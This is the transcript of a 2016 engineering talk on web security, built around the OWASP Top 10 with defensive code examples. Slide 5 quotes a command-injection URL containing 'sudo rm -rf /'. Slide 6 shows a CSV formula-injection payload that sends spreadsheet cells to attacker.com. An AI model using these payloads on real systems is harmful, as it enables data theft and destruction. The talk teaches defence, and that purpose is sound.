
Let's talk Security


Slides from Engineering Talkies at Wingify

Dheeraj Joshi

April 21, 2016



Transcript

  1. About Me
     I find security vulnerabilities for fun & swag and I wear a White Hat.
     Uber, CKEditor, Dropbox, MailChimp, InVision, DigitalOcean, Cloudflare, Intuit, Groupon, etc.
     What makes me happy?
  2. Security - Into The Details
     • OWASP's Top 10 Vulnerabilities
       ◦ Explain
       ◦ Impact
       ◦ Defense
       ◦ Real examples (External + Internal)
     • Demo - RCE
     • Q & A
  3. Why should Startups Care about Security?
     Startups & SMEs are quick to cut corners, and one of the first things they cut is 'Security'.
  4. PREVENT INJECTION
     • For databases use prepared statements
     • Whitelist inputs wherever possible
     • Sanitize inputs (use filter extension)
     • Don't trust user input and always verify!
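The first two bullets side by side, as an added example that is not from the deck: a query built by string concatenation, the same lookup as a prepared statement with a bound parameter, and a whitelist check that rejects unexpected characters before any query runs. The table, rows and `find_user_*` names are constructed for the example.

```python
import re
import sqlite3

def make_db():
    # Constructed in-memory table with sample users (not from the talk).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (name, role) VALUES (?, ?)",
        [("alice", "admin"), ("bob", "user"), ("carol", "user")],
    )
    conn.commit()
    return conn

def find_user_unsafe(conn, name):
    # Vulnerable: the caller's input is pasted into the SQL text, so a quote
    # character in it changes the structure of the query.
    sql = "SELECT name, role FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()

def find_user_safe(conn, name):
    # Prepared statement: the value is bound as a parameter and is never
    # parsed as SQL, whatever characters it contains.
    return conn.execute(
        "SELECT name, role FROM users WHERE name = ?", (name,)
    ).fetchall()

USERNAME_RE = re.compile(r"[a-z0-9_]{1,32}")

def is_valid_username(name):
    # Whitelist check: accept only the characters a username may contain
    # and reject everything else before it reaches any query.
    return isinstance(name, str) and USERNAME_RE.fullmatch(name) is not None

if __name__ == "__main__":
    db = make_db()
    print(find_user_unsafe(db, "x' OR '1'='1"))   # every row comes back
    print(find_user_safe(db, "x' OR '1'='1"))     # no such user: []
    print(is_valid_username("x' OR '1'='1"))      # False
```

The parameterised version is not a filter: the same input is accepted, it simply can never become SQL. The whitelist is an extra layer for fields whose format is known, not a substitute for binding.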
  5. Example: Google Command Injection
     We can include any command in the URL below:
     https://console.cloud.google.com/home/dashboard?project=;sudo rm -rf /
     Found by an Indian Security Researcher (S. Venkatesh)
  6. Exploiting 'Export as CSV' functionality
     Formula Injection:
     =HYPERLINK("http://attacker.com?leak="&A1&A2,"Error: please click for further information")
     If the victim clicks this cell, they will inadvertently exfiltrate the contents of cells A1 and A2 to the attacker's website, which may include other users' sensitive information.
     Fix - Prefix any cell value that begins with a formula trigger (=, +, -) with a single quote (').
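The fix from the slide as a small CSV export helper. This is an added example, not code from the talk: `escape_csv_cell` prefixes a single quote to any value that starts with a formula trigger, and `export_csv` applies it to every cell before writing. The trigger list adds `@`, which some spreadsheet applications also treat as a formula start; that addition goes beyond the slide's list of `=`, `+`, `-`. The rows are constructed.

```python
import csv
import io

# Characters that make a spreadsheet treat a cell as a formula. The slide lists
# =, + and -; '@' is included here as an addition beyond the slide because some
# spreadsheet applications treat it as a formula trigger as well.
FORMULA_TRIGGERS = ("=", "+", "-", "@")

def escape_csv_cell(value):
    # Prefix with a single quote so the spreadsheet stores the cell as text
    # instead of evaluating it.
    text = "" if value is None else str(value)
    if text.startswith(FORMULA_TRIGGERS):
        return "'" + text
    return text

def export_csv(rows):
    # Every cell goes through the escape before the csv module quotes it.
    buf = io.StringIO()
    writer = csv.writer(buf)
    for row in rows:
        writer.writerow([escape_csv_cell(cell) for cell in row])
    return buf.getvalue()

if __name__ == "__main__":
    # Constructed export: the second row carries the payload shape from the slide.
    rows = [
        ["user", "note"],
        ["mallory", '=HYPERLINK("http://attacker.com?leak="&A1&A2,"Error")'],
        ["bob", "-5 points"],
    ]
    print(export_csv(rows))
```

One caveat: a value such as `-5` is also prefixed, so numeric columns should be exported as numbers rather than free text, or the quote will show up in the sheet. The escape is applied at export time, not at input time, because the same stored string is harmless in a web page and dangerous only once it reaches a spreadsheet.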
  7. MITIGATION
     • Enforce strong password policy
     • Require periodic reset of password
     • Use 2 factor authentication
     • Use SSL and secure flag on cookies
     • Don't neglect failed-login detection & tracking
     • Only use httpOnly cookies
  8. CROSS SITE SCRIPTING - XSS
     • XSS attacks users
     • "JavaScript Injection"
     • Exploits can be bad, really bad..
  9. Protect Yourself
     • Use filter extension to filter inputs
     • Ensure that outputs are HTML encoded
     • Don't reinvent the wheel
     • Don't consider any part of the request as being "safe"
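"Ensure that outputs are HTML encoded", shown as an added example rather than anything from the deck: the same comment template rendered with and without encoding, plus an attribute-context renderer, since an unquoted or unencoded attribute value is a separate way to break out of the markup. The `render_*` names and the sample payload are constructed.

```python
import html

def render_comment_unsafe(author, body):
    # Vulnerable: untrusted strings are written straight into the markup.
    return "<p><b>" + author + "</b>: " + body + "</p>"

def render_comment_safe(author, body):
    # Encode for the HTML text context: <, >, &, " and ' become entities, so
    # whatever the user typed is displayed as text, never parsed as tags.
    return "<p><b>%s</b>: %s</p>" % (
        html.escape(author, quote=True),
        html.escape(body, quote=True),
    )

def render_search_box(query):
    # Attribute context: quote the attribute AND encode the value, so a quote
    # character in the input cannot close the attribute and start a new one.
    return '<input name="q" value="%s">' % html.escape(query, quote=True)

if __name__ == "__main__":
    payload = "<script>alert(1)</script>"   # constructed test input
    print(render_comment_unsafe("eve", payload))
    print(render_comment_safe("eve", payload))
    print(render_search_box('" onfocus="alert(1)'))
```

Encoding is done at output, per context, which is why the slide says not to reinvent the wheel: a template engine that auto-escapes covers the text and attribute contexts consistently, whereas hand-written filtering at input time has to guess where the value will end up.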
  10. ngBind attribute
      $sanitize - service in module ngSanitize: sanitizes an HTML string by stripping all potentially dangerous tokens.
  11. Scenario / Exploit
      1) First, an attacker signs up for an account and requests "forgot password".
      2) You will receive a link: https://vimeo.com/forgot_password/[user id]/[token]
  12. Prevention
      • Low level access controls
      • Prevent user input in file/URL access commands
      • No unsanitized input to execution commands
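The last two bullets as an added example (not from the deck): a file name supplied by the user is mapped onto a path that must stay inside a fixed directory, and the argument list for an external program is built as a list so that nothing in the file name is ever interpreted by a shell. The base directory, the `convert` tool and the function names are assumptions for the example.

```python
from pathlib import Path

def resolve_user_file(base_dir, user_name):
    """Map a user-supplied file name onto a path that must stay inside base_dir."""
    base = Path(base_dir).resolve()
    candidate = (base / user_name).resolve()
    # After resolving ".." segments and absolute names, the candidate must be a
    # strict descendant of the base; anything else has escaped the directory.
    if candidate == base or base not in candidate.parents:
        raise ValueError("refusing path outside %s: %r" % (base, user_name))
    return candidate

def build_thumbnail_argv(image_path):
    # Argument list for subprocess.run(argv) with shell=False: each element is
    # handed to the program as-is, so shell metacharacters in the file name are
    # data, not commands. ('convert' is an assumed example tool.)
    image_path = Path(image_path)
    return ["convert", str(image_path), "-resize", "128x128",
            str(image_path.with_suffix(".png"))]

if __name__ == "__main__":
    base = "/srv/app/uploads"   # assumed upload directory
    print(resolve_user_file(base, "report.csv"))
    try:
        resolve_user_file(base, "../../etc/passwd")
    except ValueError as exc:
        print("rejected:", exc)
    print(build_thumbnail_argv(resolve_user_file(base, "a; rm -rf x.jpg")))
```

Resolving before comparing is what defeats `..` and absolute names; checking the raw string for `..` would miss encodings and symlink tricks. The argv list is then passed to `subprocess.run` without `shell=True`, which is the Python form of "no unsanitized input to execution commands".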
  13. PREVENTION > CURE
      • Perform periodic security checks using automated tools
      • Static Code Analysis
      • Example: Hardening MySQL, Directory Listing, Auth Tokens
  14. SENSITIVE DATA EXPOSURE
      • Exposed PHP error messages
      • Unencrypted sensitive data storage
      • Not using SSL
      • Example: a sensitive token should not be sent to external websites (Fitbit)
  15. MISSING FUNCTION LEVEL ACCESS CONTROL
      • Valid input processing without access controls
      • Decentralized access control layer
      • Example: Profile email address not validated (Github), S3 configuration
  16. CROSS-SITE REQUEST FORGERY (CSRF)
      • Don't perform data changes on GET
      • Use secure (csrf) tokens for POST
      • Impact: Real bad, attacks users
      • Example: Dropbox, CodeSchool
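Both defence bullets together, as an added example that is not part of the deck: a token bound to the session with an HMAC, a constant-time check, and a handler that only renders on GET and only changes state on a POST carrying a valid token. The secret, session ids and the `change_email` action are constructed for the example.

```python
import hashlib
import hmac
import os
import secrets

# Per-process secret for this example; a real deployment loads it from configuration.
SERVER_SECRET = os.urandom(32)

def _mac(nonce, session_id):
    msg = ("%s:%s" % (nonce, session_id)).encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()

def issue_csrf_token(session_id):
    # Token = random nonce + HMAC(secret, nonce:session). Binding it to the
    # session means a token obtained in one session is useless in another.
    nonce = secrets.token_hex(16)
    return nonce + "." + _mac(nonce, session_id)

def verify_csrf_token(session_id, token):
    if not token or "." not in token:
        return False
    nonce, mac = token.split(".", 1)
    # Constant-time comparison so the check does not leak which bytes matched.
    return hmac.compare_digest(_mac(nonce, session_id), mac)

def change_email(method, session_id, form):
    """'Change e-mail' action: GET only renders the form, POST needs a valid token."""
    if method == "GET":
        # The token is embedded in the form as a hidden field; no change happens here.
        return ("200", "render form with token " + issue_csrf_token(session_id))
    if method != "POST":
        return ("405", "method not allowed")
    if not verify_csrf_token(session_id, form.get("csrf_token")):
        return ("403", "missing or invalid CSRF token")
    return ("200", "email changed to " + form.get("email", ""))

if __name__ == "__main__":
    tok = issue_csrf_token("sess-1")
    print(change_email("POST", "sess-1", {"email": "a@b"}))                       # forged: 403
    print(change_email("POST", "sess-1", {"email": "a@b", "csrf_token": tok}))   # genuine: 200
```

A cross-site form post can send the session cookie but cannot read the page that contains the hidden token, which is why the token must be something the browser does not attach automatically. Refusing to change data on GET closes the simpler case where an `<img src=...>` on another site would otherwise be enough.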
  17. USING COMPONENTS WITH KNOWN VULNERABILITIES
      • Not keeping libraries up-to-date
      • *cough*Wordpress*cough*
      • Example: Third-Party Libraries (Apache CXF Authentication Bypass, Spring RCE)
  18. UNVALIDATED REDIRECTS AND FORWARDS
      • Header Injection
      • JavaScript Parameter Injection
      • Reliance on HTTP_REFERER
      • Abuse window opener (Facebook)
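A redirect-target check covering the first bullet and the general case, added here as an example rather than taken from the deck: the `next` value is accepted only if it is a local absolute path or points at an allowed host, and values carrying CR/LF (header injection), a non-HTTP scheme, or a protocol-relative prefix fall back to a default. The allowed host list and function name are constructed.

```python
from urllib.parse import urlsplit

# Hosts this application may redirect to (constructed for the example).
ALLOWED_HOSTS = {"example.com", "www.example.com"}

def safe_redirect_target(next_url, default="/"):
    """Return next_url if it is a local path or an allowed host, otherwise default."""
    if not next_url:
        return default
    # A CR or LF in the Location value would let the caller add response headers.
    if "\r" in next_url or "\n" in next_url:
        return default
    # "//host" and "/\host" are read by browsers as protocol-relative URLs.
    if next_url[:1] == "\\" or (next_url[:1] == "/" and next_url[1:2] in ("/", "\\")):
        return default
    parts = urlsplit(next_url)
    if parts.scheme and parts.scheme.lower() not in ("http", "https"):
        return default            # javascript:, data: and friends
    if parts.netloc:
        # hostname drops userinfo and port, so "https://example.com@evil.com/"
        # is judged by "evil.com", not by what appears before the "@".
        if (parts.hostname or "").lower() not in ALLOWED_HOSTS:
            return default
        return next_url
    if not next_url.startswith("/"):
        return default            # relative names are ambiguous; require "/path"
    return next_url

if __name__ == "__main__":
    # Constructed inputs of the kinds the check is meant to sort out.
    for value in ("/dashboard", "https://example.com/settings", "https://evil.com/",
                  "//evil.com", "/\\evil.com", "javascript:alert(1)",
                  "/x\r\nSet-Cookie: a=b", "https://example.com@evil.com/"):
        print(repr(value), "->", safe_redirect_target(value))
```

The check is an allow-list on the parsed host, not a search for bad substrings in the raw string, which is why the userinfo and backslash variants are handled. For the last bullet on the slide, links that open another origin in a new tab should carry `rel="noopener"` so the opened page has no `window.opener` to navigate.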
  19. The solution
      • Reset all passwords and keys
      • Remove backdoors (not easy)
      OR Destroy everything??